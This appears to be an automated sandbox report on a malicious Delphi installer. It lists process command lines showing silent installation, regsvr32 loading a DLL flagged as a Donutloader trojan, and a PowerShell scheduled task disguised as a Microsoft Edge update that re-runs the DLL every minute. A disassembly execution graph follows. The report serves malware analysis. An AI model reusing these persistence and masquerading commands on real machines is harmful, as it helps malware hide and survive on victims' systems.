                                                                General

                                                                Target ID:3
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /T 3
                                                                Imagebase:0x8f0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:19:21:59
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0x6f0000
                                                                File size:2'495'440 bytes
                                                                MD5 hash:9170086E8D746E094AB4FE7444613030
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:19:21:59
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0xb60000
                                                                File size:3'284'992 bytes
                                                                MD5 hash:E97363B64F37EE24CDD55CEA14D1C564
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 1%, Virustotal, Browse
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:19:22:00
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
                                                                Imagebase:0x520000
                                                                File size:20'992 bytes
                                                                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:19:22:07
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
                                                                Imagebase:0x330000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:19:22:07
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:19:22:12
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                                                                Imagebase:0x330000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:19:22:12
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:19:22:16
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
                                                                Imagebase:0x7ff697ac0000
                                                                File size:25'088 bytes
                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:19:22:16
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
                                                                Imagebase:0x520000
                                                                File size:20'992 bytes
                                                                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:19:22:25
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
                                                                Imagebase:0x330000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:19:22:25
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:4%
                                                                  Dynamic/Decrypted Code Coverage:15.4%
                                                                  Signature Coverage:31.2%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:113
                                                                  execution_graph 52271 26332e0 52272 26332f3 Sleep InterlockedExchange 52271->52272 52273 2633314 Sleep 52272->52273 52275 6c855a20 52276 6c855a2e 52275->52276 52292 6c8d4f60 101 API calls 52276->52292 52278 6c855a37 52293 6c8578e0 90 API calls 52278->52293 52280 6c855b44 52330 6c8e66b0 52280->52330 52282 6c855a44 52282->52280 52283 6c855ad4 memcmp 52282->52283 52283->52282 52285 6c855ae7 52283->52285 52294 6c8543e0 52285->52294 52288 6c855aec 52290 6c855b1c 52288->52290 52335 6c85ac40 52288->52335 52289 6c855b34 52290->52289 52291 6c85ac40 HeapFree 52290->52291 52291->52289 52292->52278 52293->52282 52295 6c8543ee 52294->52295 52338 6c920e90 52295->52338 52297 6c854435 52298 6c854443 CreateMutexA GetLastError 52297->52298 52302 6c854589 52297->52302 52299 6c85447a 52298->52299 52323 6c85445f 52298->52323 52364 6c858960 52299->52364 52301 6c85ac40 HeapFree 52304 6c85446f 52301->52304 52305 6c85ac40 HeapFree 52302->52305 52303 6c854485 52390 6c855c30 CreateTimerQueue 52303->52390 52304->52288 52307 6c8545d6 52305->52307 52310 6c854607 52307->52310 52312 6c85ac40 HeapFree 52307->52312 52314 6c854610 52310->52314 52502 6c9459b0 52310->52502 52311 6c8544a6 52311->52302 52313 6c8544b1 memcpy 52311->52313 52312->52310 52316 6c8544d0 52313->52316 52316->52316 52317 6c8544e7 HeapCreate HeapAlloc GetLastError 52316->52317 52318 6c854563 52317->52318 52319 6c85450f 52317->52319 52321 6c85ac40 HeapFree 52318->52321 52320 6c855c30 115 API calls 52319->52320 52322 6c85451c 52320->52322 52321->52323 52438 6c856300 memset 52322->52438 52323->52301 52323->52304 52326 6c854544 memmove 52328 6c854558 HeapFree 52326->52328 52327 6c85ac40 HeapFree 52329 6c854541 52327->52329 52328->52318 52329->52326 52772 6c8d1d10 WaitOnAddress GetLastError WakeByAddressAll 52330->52772 52332 6c8e66bc 52773 6c8f26d0 ExitProcess 52332->52773 52334 6c8e66c3 52336 6c8e9f90 HeapFree 52335->52336 52336->52288 52339 6c920ea5 52338->52339 52343 6c920f51 52338->52343 52340 6c85ac30 3 API calls 52339->52340 52339->52343 52341 6c920ebe 52340->52341 52342 6c920ec9 memcpy 52341->52342 52341->52343 52345 6c920edf 52342->52345 52344 6c85ac40 HeapFree 52343->52344 52346 6c920f7d 52344->52346 52348 6c920f0d 52345->52348 52516 6c9210c0 91 API calls 52345->52516 52349 6c9459b0 83 API calls 52346->52349 52348->52297 52350 6c920f86 52349->52350 52351 6c85ac30 3 API calls 52350->52351 52354 6c921051 52350->52354 52352 6c920fbe 52351->52352 52353 6c920fc9 memcpy 52352->52353 52352->52354 52356 6c920fdf 52353->52356 52355 6c85ac40 HeapFree 52354->52355 52357 6c92107d 52355->52357 52359 6c92100d 52356->52359 52517 6c9210c0 91 API calls 52356->52517 52360 6c9459b0 83 API calls 52357->52360 52359->52297 52361 6c921086 52360->52361 52518 6c9210c0 91 API calls 52361->52518 52363 6c9210b1 52363->52297 52365 6c858990 52364->52365 52367 6c8589d7 52365->52367 52369 6c858a37 52365->52369 52382 6c858a2c 52365->52382 52519 6c858290 memcpy 52365->52519 52520 6c858a80 85 API calls 52367->52520 52525 6c8584c0 HeapFree 52369->52525 52370 6c8589e8 52521 6c858a80 85 API calls 52370->52521 52372 6c858a68 52374 6c9459b0 83 API calls 52372->52374 52384 6c858a71 52374->52384 52375 6c8589f9 52522 6c858a80 85 API calls 52375->52522 52377 6c858a0a 52523 6c858a80 85 API calls 52377->52523 52379 6c858b5d 52379->52303 52380 6c858a1b 52524 6c858a80 85 API calls 52380->52524 52382->52303 52384->52379 52385 6c858b49 52384->52385 52526 6c858290 memcpy 52384->52526 52385->52379 52527 6c8584c0 HeapFree 52385->52527 52387 6c858bf8 52388 6c9459b0 83 API calls 52387->52388 52389 6c858c01 52388->52389 52389->52303 52391 6c85448f 52390->52391 52392 6c855c46 CreateEventW 52390->52392 52430 6c85ac30 52391->52430 52392->52391 52393 6c855c5d GetModuleHandleA 52392->52393 52393->52391 52394 6c855c6c 52393->52394 52394->52391 52528 6c8a7960 52394->52528 52398 6c855c94 52399 6c855cb9 LoadLibraryA 52398->52399 52546 6c851dd0 52399->52546 52401 6c855d02 GetProcAddress 52547 6c851800 52401->52547 52403 6c855d6e GetModuleHandleA 52548 6c851920 52403->52548 52405 6c855db7 GetProcAddress 52549 6c8514b0 52405->52549 52407 6c855e14 LoadLibraryA 52550 6c851b20 52407->52550 52409 6c855e62 GetProcAddress 52551 6c851b00 52409->52551 52411 6c855ece LoadLibraryA 52552 6c851b40 52411->52552 52413 6c855f27 GetProcAddress 52553 6c851880 52413->52553 52415 6c855f92 LoadLibraryA 52554 6c851620 52415->52554 52417 6c855fec GetProcAddress 52555 6c8515c0 52417->52555 52431 6c8e9f30 52430->52431 52432 6c8e9f59 52431->52432 52433 6c8e9f42 52431->52433 52434 6c8fafb0 3 API calls 52432->52434 52609 6c8fafb0 52433->52609 52436 6c8e9f6c 52434->52436 52436->52311 52437 6c8e9f53 52437->52311 52439 6c85633c 52438->52439 52442 6c85647a 52438->52442 52444 6c920e90 93 API calls 52439->52444 52440 6c8565b9 AddVectoredExceptionHandler NtQueryInformationProcess 52441 6c8565f2 52440->52441 52443 6c85ac30 3 API calls 52441->52443 52442->52440 52445 6c920e90 93 API calls 52442->52445 52446 6c85660c 52443->52446 52447 6c856385 52444->52447 52448 6c8564d9 52445->52448 52449 6c856617 NtQuerySystemInformation 52446->52449 52467 6c856944 52446->52467 52450 6c856393 GetModuleHandleA 52447->52450 52447->52467 52453 6c8564e7 GetModuleHandleA 52448->52453 52448->52467 52454 6c8568b3 52449->52454 52475 6c85663a 52449->52475 52451 6c8563b7 52450->52451 52452 6c8563a9 LoadLibraryA 52450->52452 52458 6c920e90 93 API calls 52451->52458 52452->52451 52464 6c856802 52452->52464 52456 6c85651d 52453->52456 52455 6c85ac40 HeapFree 52454->52455 52457 6c854528 52455->52457 52459 6c920e90 93 API calls 52456->52459 52457->52326 52457->52327 52462 6c85641c 52458->52462 52463 6c85655b 52459->52463 52460 6c85ac40 HeapFree 52476 6c856a2a 52460->52476 52461 6c856ab9 52469 6c9459b0 83 API calls 52461->52469 52462->52467 52468 6c85642a GetProcAddress 52462->52468 52472 6c8569e3 52463->52472 52473 6c856569 GetProcAddress 52463->52473 52464->52457 52474 6c85ac40 HeapFree 52464->52474 52465 6c856694 52470 6c85689e 52465->52470 52471 6c85673a 52465->52471 52466 6c8566d3 NtOpenThread 52466->52475 52467->52460 52467->52476 52477 6c856821 52468->52477 52478 6c85643f 52468->52478 52479 6c856ac2 52469->52479 52470->52454 52484 6c85ac40 HeapFree 52470->52484 52480 6c85ac40 HeapFree 52471->52480 52472->52467 52481 6c856857 52473->52481 52482 6c85657e 52473->52482 52474->52457 52475->52454 52475->52465 52475->52466 52615 6c856f50 6 API calls 52475->52615 52476->52461 52485 6c85ac40 HeapFree 52476->52485 52477->52464 52487 6c85ac40 HeapFree 52477->52487 52483 6c85645e 52478->52483 52488 6c85ac40 HeapFree 52478->52488 52498 6c85674d 52480->52498 52489 6c85ac40 HeapFree 52481->52489 52493 6c85684f 52481->52493 52486 6c85659a 52482->52486 52491 6c85ac40 HeapFree 52482->52491 52483->52442 52494 6c85ac40 HeapFree 52483->52494 52484->52454 52485->52461 52486->52440 52492 6c85ac40 HeapFree 52486->52492 52487->52493 52488->52483 52489->52493 52491->52486 52496 6c8565b6 52492->52496 52493->52457 52493->52464 52497 6c856477 52494->52497 52495 6c856768 NtGetContextThread 52495->52464 52495->52498 52496->52440 52497->52442 52498->52464 52498->52495 52499 6c8567b6 52498->52499 52500 6c8567db NtSetContextThread 52498->52500 52499->52500 52500->52464 52501 6c8567f0 NtClose 52500->52501 52501->52464 52501->52498 52616 6c945100 52502->52616 52505 6c9459f6 52633 6c945240 73 API calls 52505->52633 52506 6c945a42 52634 6c945390 73 API calls 52506->52634 52509 6c9459fb 52510 6c945a04 52509->52510 52511 6c94d93a abort abort abort 52509->52511 52627 6c943530 52510->52627 52513 6c94d94c abort 52511->52513 52515 6c94d97e 52513->52515 52514 6c945a11 52514->52314 52516->52348 52517->52359 52518->52363 52520->52370 52521->52375 52522->52377 52523->52380 52524->52382 52525->52372 52527->52387 52558 6c8a7c30 52528->52558 52530 6c8a7969 52531 6c855c84 52530->52531 52561 6c8a93c0 6 API calls 52530->52561 52562 6c8ad7b0 91 API calls 52530->52562 52534 6c858570 52531->52534 52607 6c8a7a80 91 API calls 52534->52607 52536 6c85858a 52536->52398 52537 6c858583 52537->52536 52538 6c8585c8 52537->52538 52539 6c85ac40 HeapFree 52537->52539 52540 6c9459b0 83 API calls 52538->52540 52539->52538 52541 6c8585d1 52540->52541 52542 6c85ac40 HeapFree 52541->52542 52545 6c8585e2 52541->52545 52542->52545 52543 6c858693 52543->52398 52545->52543 52608 6c8597d0 6 API calls 52545->52608 52546->52401 52547->52403 52548->52405 52549->52407 52550->52409 52551->52411 52552->52413 52553->52415 52554->52417 52563 6c8a7ca0 52558->52563 52560 6c8a7c3f 52560->52530 52561->52530 52562->52530 52564 6c8a7cb9 TlsGetValue 52563->52564 52565 6c8a7e56 52563->52565 52566 6c8a7cc9 52564->52566 52567 6c8a7e43 52564->52567 52568 6c8a7e5c TlsGetValue 52565->52568 52566->52567 52569 6c8a7de8 52566->52569 52596 6c8ad990 52566->52596 52567->52560 52568->52566 52568->52567 52571 6c85ac30 3 API calls 52569->52571 52572 6c8a7df9 52571->52572 52573 6c8a7e00 TlsGetValue TlsSetValue 52572->52573 52580 6c8a7e72 52572->52580 52573->52567 52574 6c8a7e1e 52573->52574 52576 6c8a7e36 52574->52576 52578 6c85ac40 HeapFree 52574->52578 52575 6c8a7d04 52579 6c85ac30 3 API calls 52575->52579 52575->52580 52577 6c85ac40 HeapFree 52576->52577 52577->52567 52578->52576 52581 6c8a7d5d 52579->52581 52583 6c8a7eff 52580->52583 52585 6c85ac40 HeapFree 52580->52585 52581->52580 52582 6c8a7d68 memset 52581->52582 52582->52569 52584 6c9459b0 83 API calls 52583->52584 52586 6c8a7f08 52584->52586 52585->52583 52587 6c8a7f19 52586->52587 52588 6c85ac40 HeapFree 52586->52588 52602 6c8a7f30 HeapFree 52587->52602 52588->52587 52590 6c8a7f2a 52591 6c9459b0 83 API calls 52590->52591 52592 6c8a7f30 52591->52592 52593 6c8a7f34 52592->52593 52594 6c85ac40 HeapFree 52592->52594 52593->52560 52595 6c8a7f4a 52594->52595 52595->52560 52597 6c8ad99e 52596->52597 52601 6c8ad9c1 52596->52601 52603 6c8ade90 52597->52603 52600 6c85ac30 3 API calls 52600->52601 52601->52575 52602->52590 52604 6c8ad9a7 52603->52604 52605 6c8ade9f BCryptGenRandom 52603->52605 52604->52600 52604->52601 52605->52604 52606 6c8adeb3 SystemFunction036 52605->52606 52606->52604 52607->52537 52608->52545 52610 6c8fafcc 52609->52610 52611 6c8fafc2 HeapAlloc 52609->52611 52614 6c8faf80 GetProcessHeap HeapAlloc 52610->52614 52611->52437 52613 6c8fafd1 52613->52437 52614->52613 52615->52475 52635 6c944a90 52616->52635 52618 6c945137 52619 6c94d91c abort 52618->52619 52658 6c948b90 52618->52658 52620 6c94d94c abort 52619->52620 52622 6c94d97e 52620->52622 52623 6c945153 52623->52619 52624 6c94516d 52623->52624 52679 6c943ee0 52624->52679 52626 6c9451ae 52626->52505 52626->52506 52631 6c943549 52627->52631 52628 6c94d8f4 abort 52629 6c94d94c abort 52628->52629 52630 6c94d97e 52629->52630 52631->52628 52632 6c94363d 52631->52632 52632->52514 52633->52509 52634->52509 52636 6c944ac1 52635->52636 52640 6c944e28 52635->52640 52693 6c947400 59 API calls 52636->52693 52638 6c944ada 52639 6c944ae6 strlen 52638->52639 52638->52640 52641 6c944b20 52639->52641 52640->52618 52641->52640 52642 6c944c32 52641->52642 52696 6c9436c0 abort abort 52641->52696 52642->52640 52694 6c944200 abort abort abort abort 52642->52694 52645 6c944e20 52645->52640 52647 6c94d917 abort 52645->52647 52646 6c944c62 52646->52640 52646->52645 52646->52647 52648 6c944c92 52646->52648 52649 6c94d94c abort 52647->52649 52650 6c944e90 52648->52650 52653 6c944cb5 52648->52653 52655 6c94d97e 52649->52655 52657 6c944cdf 52650->52657 52697 6c9436c0 abort abort 52650->52697 52653->52657 52698 6c9436c0 abort abort 52653->52698 52654 6c944d02 52654->52618 52695 6c944200 abort abort abort abort 52657->52695 52659 6c948ba9 52658->52659 52664 6c948c80 52658->52664 52660 6c948be4 52659->52660 52661 6c948bae 52659->52661 52660->52623 52699 6c947c90 calloc calloc 52661->52699 52663 6c948bb5 52700 6c947600 52663->52700 52664->52623 52666 6c948bc2 52667 6c948bf0 52666->52667 52668 6c948bc8 52666->52668 52728 6c948390 52667->52728 52673 6c948c5e fprintf 52668->52673 52678 6c948bd1 52668->52678 52671 6c948c01 52671->52664 52674 6c948390 43 API calls 52671->52674 52673->52678 52675 6c948c1a 52674->52675 52675->52664 52677 6c948390 43 API calls 52675->52677 52677->52678 52678->52664 52718 6c947930 52678->52718 52684 6c943f0f 52679->52684 52680 6c9441b8 52681 6c94d908 abort 52680->52681 52687 6c9441cc 52680->52687 52682 6c94d94c abort 52681->52682 52683 6c94d97e 52682->52683 52684->52680 52684->52687 52691 6c943f55 52684->52691 52770 6c94372c abort abort abort abort 52684->52770 52685 6c94429c 52685->52626 52687->52685 52690 6c94d912 abort 52687->52690 52771 6c9436c0 abort abort 52687->52771 52688 6c94406f 52688->52626 52690->52682 52691->52681 52691->52687 52691->52688 52692 6c943860 abort abort abort abort 52691->52692 52692->52691 52693->52638 52694->52646 52695->52654 52696->52641 52697->52657 52698->52657 52699->52663 52701 6c947615 52700->52701 52702 6c947653 52700->52702 52704 6c947660 52701->52704 52706 6c947626 52701->52706 52707 6c947677 52701->52707 52708 6c9476c0 GetCurrentThreadId 52701->52708 52743 6c947590 malloc free 52702->52743 52704->52666 52705 6c94765a 52705->52701 52705->52704 52709 6c947640 GetCurrentThreadId 52706->52709 52710 6c94762d 52706->52710 52711 6c9476f0 CreateEventA 52707->52711 52712 6c94767e 52707->52712 52708->52707 52708->52710 52709->52666 52710->52666 52713 6c947740 GetLastError 52711->52713 52714 6c94771e 52711->52714 52712->52706 52717 6c9476a2 52712->52717 52744 6c94a5b0 QueryPerformanceCounter GetTickCount QueryPerformanceFrequency WaitForSingleObject WaitForSingleObject 52712->52744 52714->52712 52715 6c94772b CloseHandle 52714->52715 52715->52712 52717->52666 52719 6c947960 52718->52719 52720 6c947943 52718->52720 52745 6c947590 malloc free 52719->52745 52722 6c94794e 52720->52722 52725 6c94798b GetCurrentThreadId 52720->52725 52726 6c947959 52720->52726 52724 6c9479b0 SetEvent 52722->52724 52722->52726 52723 6c947967 52723->52720 52723->52726 52724->52726 52725->52722 52725->52726 52726->52660 52727 6c9480b0 CloseHandle free free fprintf 52726->52727 52727->52660 52729 6c9483a5 TlsGetValue 52728->52729 52730 6c9483a0 52728->52730 52732 6c9483d0 52729->52732 52733 6c9483bc 52729->52733 52746 6c948300 24 API calls 52730->52746 52747 6c9481a0 52732->52747 52733->52671 52736 6c9483e4 GetCurrentThreadId CreateEventA 52761 6c948250 52736->52761 52738 6c94842e GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 52739 6c94d979 abort 52738->52739 52740 6c94848b GetThreadPriority TlsSetValue 52738->52740 52742 6c94d97e 52739->52742 52740->52739 52741 6c9484ce 52740->52741 52741->52671 52741->52739 52743->52705 52744->52712 52745->52723 52746->52729 52748 6c947600 12 API calls 52747->52748 52749 6c9481b0 52748->52749 52750 6c948200 calloc 52749->52750 52751 6c9481ba 52749->52751 52753 6c9481cd 52750->52753 52754 6c94821a 52750->52754 52768 6c947dd0 malloc memmove realloc 52751->52768 52755 6c947930 4 API calls 52753->52755 52769 6c947dd0 malloc memmove realloc 52754->52769 52758 6c9481d9 52755->52758 52757 6c94821f 52759 6c948240 free 52757->52759 52760 6c9481c1 52757->52760 52758->52733 52758->52736 52759->52753 52760->52753 52762 6c948280 52761->52762 52763 6c948254 52761->52763 52762->52738 52764 6c948281 GetCurrentThreadId _ultoa 52763->52764 52765 6c948269 52763->52765 52766 6c9482cb OutputDebugStringA abort 52764->52766 52765->52738 52768->52760 52769->52757 52770->52691 52771->52687 52772->52332 52774 6c8f2730 GetCurrentProcessId 52773->52774 52802 6c8f2748 52774->52802 52776 6c8f2750 ProcessPrng 52776->52776 52776->52802 52777 6c85ac40 HeapFree 52777->52802 52778 6c85ac30 3 API calls 52778->52802 52779 6c8f2b80 CreateNamedPipeW 52780 6c8f2bb6 GetLastError 52779->52780 52781 6c8f2cb4 52779->52781 52785 6c8f2c5f 52780->52785 52780->52802 52782 6c8f2cca 52781->52782 52786 6c85ac40 HeapFree 52781->52786 52787 6c8f2c82 52782->52787 52795 6c8f2d3d 52782->52795 52783 6c8f2daa 52784 6c8f2de8 52783->52784 52788 6c8f2e1c 52783->52788 52796 6c8f2db0 52783->52796 52790 6c9459b0 83 API calls 52784->52790 52785->52787 52791 6c85ac40 HeapFree 52785->52791 52786->52782 52792 6c8f2c99 52787->52792 52797 6c85ac40 HeapFree 52787->52797 52788->52784 52789 6c8f2e23 CloseHandle 52788->52789 52789->52784 52794 6c8f2e32 ReadFileEx 52790->52794 52791->52787 52798 6c8f2d69 52792->52798 52799 6c8f2ca9 CloseHandle 52792->52799 52793 6c85ac40 HeapFree 52793->52788 52800 6c8f2e85 52794->52800 52801 6c8f2eb3 GetLastError 52794->52801 52795->52798 52804 6c85ac40 HeapFree 52795->52804 52796->52783 52796->52793 52797->52792 52798->52334 52799->52798 52803 6c8f2e90 SleepEx 52800->52803 52806 6c8f2e9f 52801->52806 52802->52774 52802->52776 52802->52777 52802->52778 52802->52779 52802->52783 52802->52785 52802->52796 52807 6c921760 52802->52807 52820 6c8be650 6 API calls 52802->52820 52803->52803 52803->52806 52804->52798 52806->52334 52809 6c921777 52807->52809 52811 6c92185f 52807->52811 52808 6c92189c 52808->52802 52810 6c85ac30 3 API calls 52809->52810 52809->52811 52810->52811 52811->52808 52812 6c9218f2 52811->52812 52813 6c85ac40 HeapFree 52811->52813 52814 6c9459b0 83 API calls 52812->52814 52813->52812 52815 6c9218fb 52814->52815 52816 6c85ac30 3 API calls 52815->52816 52817 6c92192e 52815->52817 52819 6c921993 52815->52819 52816->52819 52817->52802 52818 6c923100 7 API calls 52818->52819 52819->52817 52819->52818 52820->52802 52821 6c851f00 52838 6c8575c0 52821->52838 52824 6c851f2d 52845 6c8574e0 HeapFree 52824->52845 52826 6c85ac40 HeapFree 52826->52824 52827 6c851f36 52828 6c851f4d 52827->52828 52829 6c85ac40 HeapFree 52827->52829 52830 6c85202b 52828->52830 52831 6c851f5a 52828->52831 52829->52828 52846 6c85b7a0 PdhRemoveCounter CloseHandle PdhCloseQuery GetLastError 52831->52846 52833 6c851f66 52833->52830 52834 6c852003 52833->52834 52837 6c85ac40 HeapFree 52833->52837 52834->52830 52835 6c85ac40 HeapFree 52834->52835 52836 6c852026 52835->52836 52836->52830 52837->52833 52839 6c851f14 52838->52839 52842 6c8575d7 52838->52842 52839->52824 52839->52826 52840 6c8577c4 52840->52839 52841 6c85ac40 HeapFree 52840->52841 52841->52839 52842->52840 52843 6c85ac40 HeapFree 52842->52843 52847 6c858260 52842->52847 52843->52842 52845->52827 52846->52833 52852 6c861300 CloseHandle 52847->52852 52849 6c858272 52850 6c85828a 52849->52850 52851 6c85ac40 HeapFree 52849->52851 52850->52842 52851->52850 52853 6c861319 52852->52853 52855 6c861314 52852->52855 52856 6c89a6b0 GetLastError 52853->52856 52855->52849 52856->52855 52857 6c863e20 52858 6c863e31 52857->52858 52859 6c863e39 52858->52859 52862 6c863eb9 52858->52862 52860 6c874040 4 API calls 52859->52860 52861 6c863e61 52860->52861 52863 6c863ef9 52862->52863 52866 6c863f79 52862->52866 52864 6c874040 4 API calls 52863->52864 52865 6c863f21 52864->52865 52867 6c863fbe 52866->52867 52868 6c864128 52866->52868 52890 6c874040 52867->52890 52960 6c863220 6 API calls 52868->52960 52870 6c863fe7 52896 6c87afb0 52870->52896 52874 6c86414e 52876 6c9459b0 83 API calls 52874->52876 52878 6c864154 52876->52878 52877 6c864108 memcpy 52879 6c86417d 52878->52879 52880 6c86422a 52878->52880 52881 6c874040 4 API calls 52879->52881 52962 6c863220 6 API calls 52880->52962 52883 6c8641a5 52881->52883 52882 6c864065 52882->52877 52961 6c864260 115 API calls 52883->52961 52886 6c86420c memcpy 52887 6c864250 52888 6c9459b0 83 API calls 52887->52888 52889 6c864256 52888->52889 52891 6c874072 52890->52891 52892 6c874053 52890->52892 52891->52870 52892->52891 52893 6c85ac30 3 API calls 52892->52893 52894 6c874107 52893->52894 52894->52891 52895 